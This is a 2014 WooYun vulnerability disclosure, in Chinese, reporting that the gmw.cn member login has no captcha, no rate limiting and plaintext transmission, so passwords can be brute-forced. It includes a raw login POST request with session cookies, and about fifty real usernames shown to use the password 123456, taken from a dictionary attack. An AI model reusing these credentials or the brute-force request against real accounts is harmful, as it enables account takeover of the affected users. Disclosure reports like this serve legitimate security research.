当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082688

漏洞标题:光明网某登录处未设置验证码可批量爆破用户

相关厂商:gmw.cn

漏洞作者: 花心h

提交时间:2014-11-11 12:21

修复时间:2014-12-26 12:22

公开时间:2014-12-26 12:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-11: 细节已通知厂商并且等待厂商处理中
2014-11-11: 厂商已经确认,细节仅向厂商公开
2014-11-21: 细节向核心白帽子及相关领域专家公开
2014-12-01: 细节向普通白帽子公开
2014-12-11: 细节向实习白帽子公开
2014-12-26: 细节向公众公开

简要描述:

光明网某登录处未设置验证码可批量爆破用户
求Rank到10!!求现金奖励!!

详细说明:

没有做限制,没有验证码,明文传输。
http://home.gmw.cn/index.php

漏洞证明:

接口:http://home.gmw.cn/index.php
发送包:
POST /app.php?example=login HTTP/1.1
Host: home.gmw.cn
Proxy-Connection: keep-alive
Content-Length: 36
Cache-Control: max-age=0
Origin: http://home.gmw.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://home.gmw.cn/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: wdcid=7ee23c10d2756b32; vjuids=2c4bf7503.1491d799f8c.0.fc90f7d3; __auc=79eae7271491d79a20aa5157fd1; vjlast=1413538750.1415500578.11; ucsynlogin=7013pck42tQDTzFwbkCNSKWFSkwjgt8LlI%2BAxMeEfOVzMFnBYo1prg8; SKRK_04f7_saltkey=gX6iv80M; SKRK_04f7_lastvisit=1415525292; dvnC_04f7_saltkey=v93yBQQn; dvnC_04f7_lastvisit=1415525292; aezs_04f7_saltkey=cWyybYw5; aezs_04f7_lastvisit=1415525295; Hm_lvt_aed44f5ad0d4811f8ce102a91bd71f68=1414933950,1415528253; Hm_lpvt_aed44f5ad0d4811f8ce102a91bd71f68=1415528850; _ga=GA1.2.1240950397.1413538747; aezs_04f7_lastact=1415529384%09uc.php%09; SKRK_04f7_sid=zjTB6H; SKRK_04f7_lastact=1415529384%09uc.php%09; dvnC_04f7_sid=JWpb6p; dvnC_04f7_lastact=1415529384%09uc.php%09; __utmt=1; __utma=138750316.1240950397.1413538747.1415528854.1415528854.1; __utmb=138750316.9.10.1415528854; __utmc=138750316; __utmz=138750316.1415528854.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
username=1&password=123456&url=&x=63&y=9
4000的字典爆出200多个
放点账号做证明:
users 状态码 password
dun 200 123456
liz 200 123456
cyb 200 123456
kit 200 123456
lil 200 123456
ina 200 123456
bin 200 123456
liam 200 123456
USER 200 123456
pmd 200 123456
car 200 123456
cam 200 123456
gib 200 123456
DCL 200 123456
9026 200 123456
4555 200 123456
eve 200 123456
User 200 123456
milo 200 123456
jill 200 123456
gar 200 123456
cinda 200 123456
don 200 123456
green 200 123456
tome 200 123456
way 200 123456
raul 200 123456
ade 200 123456
yance 200 123456
molly 200 123456
bell 200 123456
10001 200 123456
6060 200 123456
root 200 123456
ana 200 123456
lew 200 123456
rubin 200 123456
32167 200 123456
jami 200 123456
den 200 123456
user 200 123456
rice 200 123456
bud 200 123456
maye 200 123456
hank 200 123456
gil 200 123456
youli 200 123456
timmy 200 123456
flore 200 123456
7498 200 123456

修复方案:

你们比我更专业!

版权声明:转载请注明来源 花心h@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-11-11 14:13

厂商回复:

感谢白帽子的反馈,明文的问题我们后续会使用https进行认证,同时增加验证码验证,后续会逐步完善。

最新状态:

暂无